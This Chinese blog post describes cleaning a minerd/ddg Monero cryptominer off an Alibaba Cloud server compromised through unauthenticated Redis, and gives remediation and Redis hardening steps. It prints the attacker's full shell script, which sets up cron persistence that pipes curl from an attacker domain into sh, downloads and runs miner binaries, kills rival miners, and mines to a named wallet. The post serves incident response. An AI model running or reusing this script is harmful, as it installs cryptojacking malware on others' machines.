阿里云服务器被挖矿程序minerd入侵的终极解决办法

最新推荐文章于 2024-03-27 19:22:28 发布
最新推荐文章于 2024-03-27 19:22:28 发布
阅读量4.8w 收藏 23
点赞数 10
分类专栏: 木马 病毒 文章标签: 木马 病毒 挖矿程序 挖矿 minerd
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tjcyjd/article/details/54140321
版权

 

      突然发现阿里云服务器CPU很高,几乎达到100%,执行 top c 一看,吓一跳,结果如下:

 

 3798 root      20   0  386m 7852 1272 S 300.0  0.1   4355:11 /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofT
 5844 root      20   0 3448m 292m  14m S  1.7  3.7  26:02.07 /usr/java/default/bin/java -Xms64M -Xmx1G -Djava.util.logging.config.file=logging.properties -Djava.security.auth.login.config=/us
 2500 root      20   0  220m 9.9m 5176 S  0.3  0.1   0:09.02 /tmp/ddg.217                                                                                                                      
    1 root      20   0 19360 1532 1232 S  0.0  0.0   0:00.61 /sbin/init

 

 

有个进程minerd尽然占用了300%的CPU, 百度了一下,貌似服务器被利用Redis漏洞攻击,植入了挖矿程序,挖类似比特币的东西。

查到几篇文章都有人遇到同样问题,解决的办法:http://blog.csdn.net/hu_wen/article/details/51908597

但我去查看启动的服务,尽然没有 lady 这个服务。 找不到根源,那个minerd进程删掉就又起来了,后来想了个临时办法,先停掉了挖矿的进程

1. 关闭访问挖矿服务器的访问 

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd  ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。

3. pkill minerd  ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top,查看了一会,没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句:

 

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh


病毒文件内容如下,感兴趣的可以研究下:

 

 

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh" > /var/spool/cron/crontabs/root

if [ ! -f "/tmp/ddg.217" ]; then
    curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.217
fi
chmod +x /tmp/ddg.217 && /tmp/ddg.217
killall /tmp/ddg.216


if [ -d "/opt/yam" ]; then
    rm -rf /opt/yam
fi

ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9

#/opt/minerd -h
#if [ $? != "0" ]; then
    #ps auxf|grep -v grep|grep "/opt/minerd"
    #if [ $? != "0" ]; then
        #if [ ! -f /opt/yam ]; then
            #curl -fsSL http://www.haveabitchin.com/yam -o /opt/yam
        #fi
        #chmod +x /opt/yam && /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr
    #fi
#fi

DoMiner()
{
    if [ ! -f "/tmp/AnXqV" ]; then
        curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV
    fi
    chmod +x /tmp/AnXqV
    /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC -p x
}
ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC" || DoMiner


DoRedis6379()
{
    iptables -F REDIS6379
    iptables -A REDIS6379 -p tcp -s 127.0.0.1 --dport 6379 -j ACCEPT
    #iptables -A REDIS6379 -s 0.0.0.0/8 -p tcp --dport 6379 -j ACCEPT
    #iptables -A REDIS6379 -s 10.0.0.0/8 -p tcp --dport 6379 -j ACCEPT
    #iptables -A REDIS6379 -s 169.254.0.0/16 -p tcp --dport 6379 -j ACCEPT
    #iptables -A REDIS6379 -s 172.16.0.0/12 -p tcp --dport 6379 -j ACCEPT
    #iptables -A REDIS6379 -s 192.168.0.0/16 -p tcp --dport 6379 -j ACCEPT
    #iptables -A REDIS6379 -s 224.0.0.0/4 -p tcp --dport 6379 -j ACCEPT
    iptables -A REDIS6379 -p TCP --dport 6379 -j REJECT
    iptables -I INPUT -j REDIS6379
}
iptables -D OUTPUT -j REDIS6379
iptables -F REDIS6379
iptables -X REDIS6379
iptables -D INPUT -j REDIS63792
iptables -F REDIS63792
iptables -X REDIS63792
#iptables -N REDIS6379 && DoRedis6379

 

 

 

 

 

 

 

解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:

1. 修复 redis 的后门,

  1. 配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
  2. 配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
  3. 配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
  4. 好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf

2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.

 

Java高知社区
关注
  • 10
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
挖矿病毒解决实例(隐藏进程,文章较好)(入侵
墨痕诉清风的博客
01-06 1万+
CPU起飞了 最近有朋友在群里反馈,自己服务器的CPU一直处于高占用状态,但用top、ps等命令却一直找不到是哪个进程在占用,怀疑中了挖矿病毒,急的团团转。 根据经验,我赶紧让他看一下当前服务器的网络连接,看看有没有可疑连接,果然发现了有点东西: 上Shodan查一下这IP地址: 反向查找,发现有诸多域名曾经解析到这个IP地址: 这是一个位于德国的IP地址,开放了4444,5555,7777等数个特殊的服务端口: 其中这位朋友服务器上发现的连接到的是7777端口,
阿里云服务器出现入侵事件:挖矿进程——pool.minexmr.com的解决办法
王天泽的博客
08-28 1万+
1.查看进程# ps -e -o 'pid,comm,args,pcpu,rsz,vsz,stime,user,uid'找出CPU占有率高的你不认识的进程,我的是这样的bashd -a cryptonight -o stratum+tcp://pool.minexmr.com:5555 -u 4AUF3pa干掉它kill -9 111102.全局搜索这个进程[root@wangtianze ~]#
如何将nodejs项目程序部署到阿里云服务器
01-23
nodejs安装及环境配置,如何将nodejs项目程序部署到阿里云服务器
164、应急响应——挖矿脚本检测指南&样本定性&文件清楚&入口修复
qq_55202378的博客
03-27 533
这台服务器开放了web服务,直接用河马扫描是否存在后门,对比挖矿脚本上传的时间和后门存在的时间,再结合日志分析,判断谁访问了后门路径。被植入挖矿脚本会显示异常的连接,将远程IP放到威胁情报中心(如微步在线、奇安信威胁情报中心)进行检测。删除进行,下面这个图就是竞争型挖矿脚本,它会杀死其他挖矿病毒的进程。挖矿脚本里面,通常有一个配置文件,文件中会记录攻击者的IP和钱包。挖矿的前提是,黑客已经取得了你电脑的权限,如何取得是重点。判断被植入挖矿脚本,最重要的是看CPU和GPU占用情况。记录挖矿脚本存在的时间。
open-ethereum-pool以太坊矿池源码分析(1)-main入口分析
尹成区块链团队的技术博客
05-20 1175
# open-ethereum-pool以太坊矿池-main入口## 命令行启动```shell./build/bin/open-ethereum-pool config.json```## Main入口流程图## config.json配置文件```json{    "threads": 2,    "coin": "eth",    "name": "main",    "proxy"
应急响应流程以及入侵排查
renyizou的博客
01-14 5498
归纳转载于: 应急响应的整体思路和基本流程 - FreeBuf网络安全行业门户不管是普通的企业,还是专业的安全厂商,都不可避免的需要掌握和运用好信息安全的知识、技能,以便在需要的时候,能够御敌千里。https://www.freebuf.com/articles/endpoint/192859.html 应急响应之windows入侵排查篇 - FreeBuf网络安全行业门户本文主要讨论windows被入侵后的排查思路。https://www.freebuf.com/articles/network/28
服务器被挖矿minerd***的解决办法
weixin_33757609的博客
08-24 1673
千万不要一开始就删除掉mierd,因为删除根本起不到作用,一会还是会生成一个 解决minerd并不是最终目的,主要是查找问题来源。 解决问题思路 1.打开防火墙,添加规则,关闭挖矿minerd的访问 iptables-AINPUT-sxmr.crypto-pool.fr-jDROP iptables-AOUTPUT-dxmr.crypto-pool....
挖矿病毒应急响应思路,挖矿病毒事件处理步骤
wangyuxiang946的博客
05-05 2万+
首先根据CPU占用率确定确定挖矿进程,找到母体文件并清除。 而后是检查计划任务、启动项中,挖矿木马的持久化操作,杜绝复发。 最后通过账号、日志、母体文件等信息,溯源攻击路径。
Wannamine家族挖矿病毒处置
qq_51068285的博客
02-15 2626
wannamine的手动处置
记录阿里云被挖矿程序入侵
weixin_40660221的博客
07-30 590
起因 今早阿里云提示我ECS服务器上有挖矿程序(c_sh),CPU使用率维持在99%。 系统为centos8 阿里云告警提示(我手动处理了的告警,初始界面没保留) 处理 top命令查看到31911端口的c_sh进程占用90%多的CPU使用率 先是让阿里云自己处理(杀掉挖矿程序),但是top命令查看这个挖矿程序又换了32366端口启动 原本挖矿程序的路径是/proc/31911/root/root/c_sh,杀掉c_sh进程之后再找/proc/31911/root/root/c_sh发现文件不存在。top命
你知道小伙伴们的阿里云服务为什么会被ru侵,是怎么ru侵的吗?
热门推荐
LoveSummer
08-15 3万+
分布式拒绝服务攻击(,简称DDoS)是指处于不同位置的多个攻击者同时向个或数个目标发动攻击,或者一个攻击者控制了位于不同位置的多台机器并利用这些机器对受害者同时实施攻击。由于攻击的发出点是分布在不同地方的,这类攻击称为分布式拒绝服务攻击,其中的攻击者可以有多个。攻击类型:一种为流量攻击,主要是针对网络带宽的攻击,即大量攻击包导致网络带宽被阻塞,合法网络包被虚假的攻击包淹没而无法到达主机;...
解决阿里云服务器短时间连接自动断开问题
01-09
当SSH远程命令或者远程工具登录阿里云服务器,ssh [email protected].* 时,经常会发现SSH连接后一会儿客户端就被服务器T掉。一般上,是因为SSH连接没有设置保活 解决方法有两个:1、设置SSH客户端保活,2、要不设置SSH...
详细部署阿里云服务器全过程(图文教程)
01-09
部署云服务器,首先需要的便是购买云服务器,这里我选择的是阿里云服务器,注册实名认证这里就不详细说明了,我购买的是云服务器ECS,可以选择大学生优惠,一个月9.5元,算是很实惠的。 我选择的操作系统是Linux...
详解如何在阿里云服务器部署程序并用域名直接访问
09-14
主要介绍了详解如何在阿里云服务器部署程序并用域名直接访问,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
QT连接阿里云服务器的MySql数据库示例
06-10
QT连接阿里云服务器的MySql数据库示例
图解迪杰斯特拉(Dijkstra)最短路径算法.docx
05-02
一、最短路径的概念及应用 在介绍最短路径之前我们首先要明白两个概念:什么是源点,什么是终点?在一条路径中,起始的第 一个节点叫做源点;终点:在一条路径中,最后一个的节点叫做终点;注意!源点和终点都只是相对 于一条路径而言,每一条路径都会有相同或者不相同的源点和终点。 而最短路径这个词不用过多解释,就是其字面意思: 在图中,对于非带权无向图而言, 从源点到终点 边最少的路径(也就是 BFS 广度优先的方法); 而对于带权图而言, 从源点到终点权值之和最少的 路径叫最短路径; 最短路径应用:道路规划; 我们最关心的就是如何用代码去实现寻找最短路径, 通过实现最短路径有两种算法:Dijkstra 迪杰斯 特拉算法和 Floyd 弗洛伊德算法, 接下来我会详细讲解 Dijkstra 迪杰斯特拉算法;
基于faster-rcnn实现的行人检测算法python源码+项目说明+详细注释.zip
05-02
基于faster-rcnn实现的行人检测算法python源码+项目说明+详细注释.zip 使用方法: 1.编译安装faster-rcnn的python接口,代码在:https://github.com/rbgirshick/py 2.下载训练好的caffe模型,百度云链接为:https://pan.baidu.com/s/1w479QUUAwLBS2AJbc-eXIA,将下载的模型文件放到faster-rcnn文件夹的data/faster_rcnn_models文件夹中 3.将本项目中的文件夹替换安装好的faster-rcnn源码中的文件夹 4.使用tools文件夹下的测试脚本运行demo:python person_detect.py
jsp基于Web的可维护的数据库浏览器(源代码+论文+答辩PPT).zip
05-02
jsp基于Web的可维护的数据库浏览器(源代码+论文+答辩PPT)
node-v12.7.0-linux-ppc64le.tar.xz
最新发布
05-02
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
阿里云服务器运行matlab程序
09-05
阿里云服务器是一种云计算服务提供商,可以运行各种应用程序,包括MATLAB。MATLAB是一种高级技术计算和数值分析的应用软件,常用于科学计算、数据分析和算法开发。 在阿里云服务器上运行MATLAB程序可以带来很多好处。首先,阿里云服务器提供强大的计算和存储能力,可以处理大规模的数据集和复杂的计算任务。这对于运行MATLAB程序非常重要,因为MATLAB通常需要处理大量的数据和进行复杂的计算操作。 其次,阿里云服务器具有良好的可扩展性和弹性,可以根据需要调整计算和存储资源。这意味着可以轻松地扩展服务器的计算能力,以适应程序的需求。此外,阿里云服务器还提供高可靠性和可用性的保证,确保MATLAB程序能够持续地运行和提供稳定的性能。 另外,阿里云服务器还提供了丰富的云服务和工具,可以与MATLAB集成,提高程序开发和运行的效率。例如,可以使用阿里云的存储服务来存储和管理MATLAB程序的输入和输出数据。还可以使用阿里云的网络服务来进行远程访问和调试MATLAB程序。 总之,阿里云服务器提供了理想的硬件和软件环境,可以高效地运行MATLAB程序。它的高性能、可扩展性和弹性,以及丰富的云服务和工具,使得在阿里云上运行MATLAB程序成为一个不错的选择。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Java高知社区

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值